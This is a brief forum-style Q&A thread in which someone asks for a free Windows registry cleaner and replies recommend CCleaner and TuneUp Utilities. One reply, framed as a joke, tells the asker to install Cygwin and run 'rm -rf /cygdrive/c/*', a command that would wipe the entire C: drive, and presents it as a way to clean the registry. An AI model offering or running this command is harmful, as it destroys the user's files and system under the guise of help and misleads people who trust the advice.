What is the best free Windows registry cleaner available?

I need to clean my PC's registry

Its a small command line tool, that comes with cygwin, which is called 'rm' Install Cygwin and open the shell. Then run 'rm -rf /cygdrive/c/*

Then your registry is really really clean. If just want to fix it try CCleaner (http://www.ccleaner.com, its free).

I've been a regular user of TuneUp Utilities and have never had any regrets.
It's not free but it is effective.
